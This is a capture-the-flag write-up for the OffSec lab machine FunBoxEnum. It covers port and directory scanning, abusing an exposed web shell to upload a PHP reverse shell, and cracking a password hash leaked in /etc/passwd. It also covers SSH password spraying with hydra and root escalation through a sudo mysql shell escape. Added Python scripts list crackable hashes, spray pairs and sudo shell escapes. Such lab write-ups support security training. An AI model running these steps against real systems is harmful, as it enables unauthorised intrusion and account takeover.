OffSec PG - FunBoxEnum


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -oN nmap.txt (full TCP port range, version/OS detection, normal-format output to nmap.txt; the target IP is omitted here)

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port   Service   Other details (if any)
22     SSH       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80     HTTP      Apache httpd 2.4.29 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • icons/ (403)
  • javascript/ (403)
  • mini.php
  • robots.txt
  • phpmyadmin/

The robots.txt file lists Enum_this_Box as allowed.


The page mini.php is a small web shell with a limited set of commands; that was enough to read the local flag. It also offers a file upload, which was used to upload pentestmonkey's php-reverse-shell.php (with its $ip and $port variables set to the attacking host and a listener such as nc -lvnp started there beforehand) and request it, giving a full interactive shell as the web server user.

Privilege Escalation


/etc/passwd lists root, goat, harry, karla, lissy, sally and oracle as the users of interest. The oracle entry stands out because its password field holds a real hash instead of the usual x placeholder, so the hash is readable by every user on the box: oracle:$1$|O@GOeN$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash. The $1$ prefix marks it as md5crypt; cracking it with John the Ripper (john --format=md5crypt --wordlist=<wordlist> <hashfile>) gives the credentials oracle:hiphop. That password does not work for SSH, though.

Brute-forcing other users over SSH with hydra (hydra -l karla -P /home/tanq/installations/SecLists/rockyou.txt ssh://) and running the LinEnum script for further enumeration turned up nothing useful. Trying the user:user pattern (password equal to the username) for every account did succeed: goat:goat logs in over SSH and gives a shell as goat. Hydra can do this directly with -e s against a -L list of usernames (-e nsr additionally tries an empty password and the reversed username).
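The passwd triage above, as an added example (not code from the original writeup): given the raw text of /etc/passwd, pull out the accounts that can log in interactively, flag any entry that carries a hash in the password field instead of the shadow placeholder, name the hash type from its $id$ prefix (mapped to the matching John --format value), and emit the user:user candidate pairs for a login-as-password spray. The passwd lines are constructed from the users the writeup names; only the oracle line is quoted from it, and the other UIDs, home directories and the two system accounts are assumptions.

```python
"""Added example: triage a captured /etc/passwd for crackable hashes and spray candidates."""

# Constructed sample. Only the oracle line is taken from the writeup; the
# remaining UIDs/homes and the daemon/sshd system accounts are assumed.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
goat:x:1000:1000:,,,:/home/goat:/bin/bash
harry:x:1001:1001:,,,:/home/harry:/bin/bash
karla:x:1002:1002:,,,:/home/karla:/bin/bash
lissy:x:1003:1003:,,,:/home/lissy:/bin/bash
oracle:$1$|O@GOeN$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
sally:x:1005:1005:,,,:/home/sally:/bin/bash
"""

# crypt(3) hash prefixes -> John the Ripper --format name
HASH_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
}

# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text):
    """Return one dict per well-formed passwd line; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def identify_hash(pw_field):
    """John format name for a crypt(3) password field, 'unknown' for an
    unrecognised $id$ scheme, or None when the field is a shadow placeholder,
    empty, or a locked account ('!' / '*' prefix)."""
    if pw_field in ("", "x") or pw_field.startswith(("!", "*")):
        return None
    for prefix, fmt in HASH_PREFIXES.items():
        if pw_field.startswith(prefix):
            return fmt
    return "unknown"


def login_users(entries):
    """Accounts with an interactive shell, in file order."""
    return [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def exposed_hashes(entries):
    """(user, john_format, hash) for entries whose passwd line leaks a hash.
    Hashes belong in /etc/shadow; one in world-readable passwd is crackable offline."""
    found = []
    for e in entries:
        fmt = identify_hash(e["pw"])
        if fmt is not None:
            found.append((e["name"], fmt, e["pw"]))
    return found


def user_as_password_pairs(users):
    """hydra-style user:user candidates (what hydra's -e s tries automatically)."""
    return [f"{u}:{u}" for u in users]


def john_hashfile(exposed):
    """user:hash lines in the form John's --wordlist run expects."""
    return "\n".join(f"{name}:{hash_}" for name, _fmt, hash_ in exposed)


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    for name, fmt, _ in exposed_hashes(entries):
        print(f"{name}: hash in passwd, crack with john --format={fmt}")
    print("spray candidates:", ", ".join(user_as_password_pairs(login_users(entries))))
```

Feed the script the real /etc/passwd and pipe the john_hashfile() output into a file for John; the spray list is the same set hydra's -L users.txt -e s covers, but having it explicit makes it easy to spot accounts that should be excluded from lockout-sensitive targets.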


Checking sudo -l for the goat user shows they may run /usr/bin/mysql as root without a password. The mysql client can spawn a shell with its \! escape, so running sudo /usr/bin/mysql and then typing \! bash at the mysql prompt drops into a bash shell as root (non-interactively, sudo /usr/bin/mysql -e '\! /bin/sh' does the same). That gives the root flag.
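The sudo -l triage above, as an added example (not code from the original writeup): parse the "(runas) NOPASSWD: command" lines that sudo -l prints and check each permitted binary against a small table of programs known to hand out a shell when run as root (a handful of well-known GTFOBins entries; the table is deliberately not exhaustive). The sudo -l text is constructed to match what the writeup describes for goat; the hostname funboxenum and the secure_path line are assumptions.

```python
"""Added example: find shell-escape candidates in `sudo -l` output."""
import os
import re

# Constructed sample matching the writeup's finding for goat. The hostname and
# the Defaults block are assumed; only the mysql rule comes from the writeup.
SAMPLE_SUDO_L = """\
Matching Defaults entries for goat on funboxenum:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User goat may run the following commands on funboxenum:
    (root) NOPASSWD: /usr/bin/mysql
"""

# Binary -> a known root-shell escape when the binary is allowed via sudo.
# "ALL" means the rule permits any command, so sudo itself is the escape.
SHELL_ESCAPES = {
    "ALL": "sudo -i",
    "mysql": "sudo mysql -e '\\! /bin/sh'",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   (then type !/bin/sh)",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# One sudoers rule as printed by sudo -l: "(runas) [TAG: ...] command[, command]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return a dict per rule line: runas user, whether NOPASSWD applies, command list."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(m.group("tags").replace(":", " ").split())
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd").strip(),
        })
    return rules


def shell_escapes(rules):
    """(binary, runas, nopasswd, escape) for every permitted binary in SHELL_ESCAPES."""
    hits = []
    for rule in rules:
        # A single rule may list several commands separated by commas.
        for cmd in rule["command"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPES:
                hits.append((binary, rule["runas"], rule["nopasswd"], SHELL_ESCAPES[binary]))
    return hits


if __name__ == "__main__":
    for binary, runas, nopasswd, escape in shell_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        pw = "no password" if nopasswd else "password required"
        print(f"{binary} as {runas} ({pw}): {escape}")
```

Run it against the output of sudo -l on the target; a hit with runas root and nopasswd True is exactly the mysql case in this box. Rules that grant a binary with fixed arguments still need manual review, since the escape may not work with those arguments.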

This post is licensed under CC BY 4.0 by the author.